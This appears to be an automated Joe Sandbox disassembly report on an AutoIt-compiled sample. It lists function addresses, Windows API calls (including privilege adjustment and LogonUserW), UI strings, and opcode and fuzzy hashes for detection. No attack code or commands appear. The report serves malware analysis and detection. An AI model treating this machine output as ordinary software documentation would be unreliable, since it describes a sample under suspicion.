CloseHandle.KERNEL32(?,?,003F8309), ref: 003F81F2

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: f59583bc9aeb9a6667fcd65eeebe8de0c18503413f1aedde87dc3a356cda6b26
Instruction ID: da38ac9da72a000d96475c1720b290f9a5d3a6877135afa6b22a732a9ccde146
Opcode Fuzzy Hash: f59583bc9aeb9a6667fcd65eeebe8de0c18503413f1aedde87dc3a356cda6b26
Instruction Fuzzy Hash: 8CE0BF71010510EEE7262B70EC05E7777A9EF04350B54893DB955C4470DB616C91DB14

Function 003CA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,003C8D57,?,?,?,00000001), ref: 003CA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003CA163

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: acba87116983ee1c1e783afcc236e17eefffcb3c8087b95c90dd3a7f2895dcc3
Instruction ID: 928f93adb1ca250939f61fdd70d26c38e2fdefa9b51ac6feeb5f5fdf2a6a5888
Opcode Fuzzy Hash: acba87116983ee1c1e783afcc236e17eefffcb3c8087b95c90dd3a7f2895dcc3
Instruction Fuzzy Hash: 1AB09231254208EBCA106B91EC09B883F78EB44AA2FC04030FA0D84C60CB6254568A9D

Function 003CF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8462868d03e60b190c21f65e4c7a9a9dbdf685e5f64906d49b5a1f3823c6732c
Instruction ID: 4a95bb0f3193de9ff038d08fc827085d141e8cd10851ebbe20ca74dbc798db0f
Opcode Fuzzy Hash: 8462868d03e60b190c21f65e4c7a9a9dbdf685e5f64906d49b5a1f3823c6732c
Instruction Fuzzy Hash: A2323561D29F454DD7239634D832336A259AFB73C8F15E73BF819F59A6EB28D8834200

Function 003D242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f968564f2bf68688314de0408128af2740e0e06f8716509aaff8bdd003e12ee
Instruction ID: 676774de0cf83d7c9ae97705bfb6db1225c6274d28b05a590a33df7b84cd03e1
Opcode Fuzzy Hash: 3f968564f2bf68688314de0408128af2740e0e06f8716509aaff8bdd003e12ee
Instruction Fuzzy Hash: CBB11131D6AF404DD32396399831336B65CAFBB2C5F51E72BFC6670D22EB2285934145

Function 00404C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00404C76

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: ed0fdf776d0d86ecf2cb98fe9b9a1b2a33ec350f3714fea93704572152f4bf45
Instruction ID: 7bb58f980c6be016c4d3186cb90020ab697eda190b8ad01b36bf1e19b8eb9b9d
Opcode Fuzzy Hash: ed0fdf776d0d86ecf2cb98fe9b9a1b2a33ec350f3714fea93704572152f4bf45
Instruction Fuzzy Hash: 5ED017E812A20838F8A80730894FF7B1109E3C0781FC6817B7341A52C1A8BCA841A03D

Function 003F87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003F8389), ref: 003F87D1

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 4963c998be847627f7dd2f691ebd7dc672fe0638739c32eb1372ebcc4de41af1
Instruction ID: 1160b2297a53a82f829b1da30006ee974c739b1d61379931b64bdb6bf38c4ee9
Opcode Fuzzy Hash: 4963c998be847627f7dd2f691ebd7dc672fe0638739c32eb1372ebcc4de41af1
Instruction Fuzzy Hash: 8ED05E3226050EABEF018EA4DD01EAE3B69EB04B01F808121FE15D50A1C775E835AB60

Function 003CA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 003CA12A

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e671cde4eac54eeb80808407b07334b7e2a8271ab62e578e748a65387c8b13d2
Instruction ID: 099e38cd79aea21ea1d7a236294a1a24610fe2ee5f779effefbff63ba5aeff6c
Opcode Fuzzy Hash: e671cde4eac54eeb80808407b07334b7e2a8271ab62e578e748a65387c8b13d2
Instruction Fuzzy Hash: A3A0113000020CEB8A002B82EC08888BFACEA002A0B808030F80C808228B32A8228A88

Function 003B8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e11cceec3905ad08e0df1e073b55427e821027f91aefa56faa48fc0115490b41
Instruction ID: 1aaa1e52f9b8ec71dc22391883680f821b9e35df952c34f12740514bf763689f
Opcode Fuzzy Hash: e11cceec3905ad08e0df1e073b55427e821027f91aefa56faa48fc0115490b41
Instruction Fuzzy Hash: BA22263060450ADBDF2B8B28C4947BD77A9FB41308F2A856BD7468BD92DB70ED92C741

Function 003C21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 875a2f2d72f1d51e083d9408227deb8ae05b3bcdb4d28d641fcd78e26294ad87
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 37C151372051930AEB6E463A8434A3FBAA15EA37B131B075DD8B3CB1D5EE20CD659760

Function 003C25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 9197028c94726287b1a917a817961c3968958dbc7031fc5561b79fe07817f734
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: F1C1623320519309EB2E463A8474A3FBAA15EA37B131B076DD4B3DB1D5EE20CD75A760

Function 003C1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 5be1aa6bf4d994ecd5a854264bb0f4200a8d8dde7a310d5a66d23bd47782ce9b
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 0CC1733720519309EF2E46398434A3EBAA15EA37B131B075DE4B3CB1D6EE20CD75A760

Function 00417806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0041785B
DeleteObject.GDI32(00000000), ref: 0041786D
DestroyWindow.USER32 ref: 0041787B
GetDesktopWindow.USER32 ref: 00417895
GetWindowRect.USER32(00000000), ref: 0041789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004179DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004179ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00417A35
GetClientRect.USER32(00000000,?), ref: 00417A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00417A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00417A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00417AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00417ABB
GlobalLock.KERNEL32(00000000), ref: 00417AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00417AD3
GlobalUnlock.KERNEL32(00000000), ref: 00417ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00417AE3
GlobalFree.KERNEL32(00000000), ref: 00417AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00417B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00432CAC,00000000), ref: 00417B16
GlobalFree.KERNEL32(00000000), ref: 00417B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00417B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00417B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00417B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00417D7A

Strings

static, xrefs: 00417A75, 00417BCC
DISPLAY, xrefs: 00417BDD
AutoIt v3, xrefs: 00417A2D
, xrefs: 00417D00

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 97f4dc1579d64d46bb39a8740a9f313750609f5d17befe1e2469e9781c8a164c
Instruction ID: f085ed9272734d84fc04b3650c177635b24bdb3523a5fee5f7cc132a0b2dd631
Opcode Fuzzy Hash: 97f4dc1579d64d46bb39a8740a9f313750609f5d17befe1e2469e9781c8a164c
Instruction Fuzzy Hash: 0F02AD71A00104EFDB14DFA4DD89EAF7BB9EF49310F408169F805AB2A1DB74AD46CB64

Function 0042356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0042F910), ref: 00423627
IsWindowVisible.USER32(?), ref: 0042364B

Strings

SENDCOMMANDID, xrefs: 004239DA
DELSTRING, xrefs: 00423749
FINDSTRING, xrefs: 00423776
EDITPASTE, xrefs: 0042395F
SETCURRENTSELECTION, xrefs: 004237B6
GETLINECOUNT, xrefs: 004238C6
TABLEFT, xrefs: 00423687
HIDEDROPDOWN, xrefs: 00423700
SELECTSTRING, xrefs: 00423806
ADDSTRING, xrefs: 00423716
GETCURRENTCOL, xrefs: 00423928
SHOWDROPDOWN, xrefs: 004236E0
GETCURRENTSELECTION, xrefs: 004237E3
UNCHECK, xrefs: 00423883
ISENABLED, xrefs: 0042366B
ISCHECKED, xrefs: 00423839
CHECK, xrefs: 0042386D
GETLINE, xrefs: 0042399B
GETSELECTED, xrefs: 004238A3
CURRENTTAB, xrefs: 004236BD
GETCURRENTLINE, xrefs: 004238ED
ISVISIBLE, xrefs: 00423637
TABRIGHT, xrefs: 0042369D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 72016ea17759053fe4a9b74a913e853569c68214550627991a970430b9a23b08
Instruction ID: ee63f10aeb1624320be47720e4ee2274a865b708848bd26b7044122dd282b48b
Opcode Fuzzy Hash: 72016ea17759053fe4a9b74a913e853569c68214550627991a970430b9a23b08
Instruction Fuzzy Hash: 63D19E30308311DBCB05EF10D451B6E77A5AF95345F44846AF8869F3A2CB29EE4ACB4A

Function 0042A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0042A630
GetSysColorBrush.USER32(0000000F), ref: 0042A661
GetSysColor.USER32(0000000F), ref: 0042A66D
SetBkColor.GDI32(?,000000FF), ref: 0042A687
SelectObject.GDI32(?,00000000), ref: 0042A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0042A6C1
GetSysColor.USER32(00000010), ref: 0042A6C9
CreateSolidBrush.GDI32(00000000), ref: 0042A6D0
FrameRect.USER32(?,?,00000000), ref: 0042A6DF
DeleteObject.GDI32(00000000), ref: 0042A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0042A731
FillRect.USER32(?,?,00000000), ref: 0042A763
GetWindowLongW.USER32(?,000000F0), ref: 0042A78E

Part of subcall function 0042A8CA: GetSysColor.USER32(00000012), ref: 0042A903
Part of subcall function 0042A8CA: SetTextColor.GDI32(?,?), ref: 0042A907
Part of subcall function 0042A8CA: GetSysColorBrush.USER32(0000000F), ref: 0042A91D
Part of subcall function 0042A8CA: GetSysColor.USER32(0000000F), ref: 0042A928
Part of subcall function 0042A8CA: GetSysColor.USER32(00000011), ref: 0042A945
Part of subcall function 0042A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0042A953
Part of subcall function 0042A8CA: SelectObject.GDI32(?,00000000), ref: 0042A964
Part of subcall function 0042A8CA: SetBkColor.GDI32(?,00000000), ref: 0042A96D
Part of subcall function 0042A8CA: SelectObject.GDI32(?,?), ref: 0042A97A
Part of subcall function 0042A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0042A999
Part of subcall function 0042A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0042A9B0
Part of subcall function 0042A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0042A9C5
Part of subcall function 0042A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0042A9ED

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 4a507b9c3837e40da01d7ce0528fce4e6a65b7356a5fa28b80da39fc54f6c75a
Instruction ID: 6c6b56f3202c87f97ec0b2df2e0126b84d1cf530e67be6d66d3826cdba836d03
Opcode Fuzzy Hash: 4a507b9c3837e40da01d7ce0528fce4e6a65b7356a5fa28b80da39fc54f6c75a
Instruction Fuzzy Hash: 1F917F71208311BFC7209F64DC08E5BBBB9FF88321F900A39F952961A1D774D95ACB5A

Function 003A2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 003A2CA2
DeleteObject.GDI32(00000000), ref: 003A2CE8
DeleteObject.GDI32(00000000), ref: 003A2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 003A2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 003A2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 003DC43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003DC474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 003DC89D

Part of subcall function 003A1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003A2036,?,00000000,?,?,?,?,003A16CB,00000000,?), ref: 003A1B9A

SendMessageW.USER32(?,00001053), ref: 003DC8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003DC8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 003DC907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 003DC912

Strings

0, xrefs: 003DC731

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 395efae4f4677a0efa91514934e70b2ff4022db2792cf359b54e4e25f4fd09b1
Instruction ID: 920a84ec8179eaf4fcebf32d15306c13b55b8c8f3dd61ea8e0512bc1fc0e33bf
Opcode Fuzzy Hash: 395efae4f4677a0efa91514934e70b2ff4022db2792cf359b54e4e25f4fd09b1
Instruction Fuzzy Hash: BA12BF31624202EFDB22CF28D884BAAB7E6FF05310F95557AF455CB662C731E846CB90

Function 004174AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 004174DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0041759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004175DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004175ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00417633
GetClientRect.USER32(00000000,?), ref: 0041763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00417683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417692
GetStockObject.GDI32(00000011), ref: 004176A2
SelectObject.GDI32(00000000,00000000), ref: 004176A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004176B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004176BF
DeleteDC.GDI32(00000000), ref: 004176C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004176F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0041770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00417746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0041775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0041776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0041779B
GetStockObject.GDI32(00000011), ref: 004177A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004177B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004177BB

Strings

static, xrefs: 0041767D, 00417795
msctls_progress32, xrefs: 0041773C
DISPLAY, xrefs: 00417688
AutoIt v3, xrefs: 0041762B

Memory Dump Source

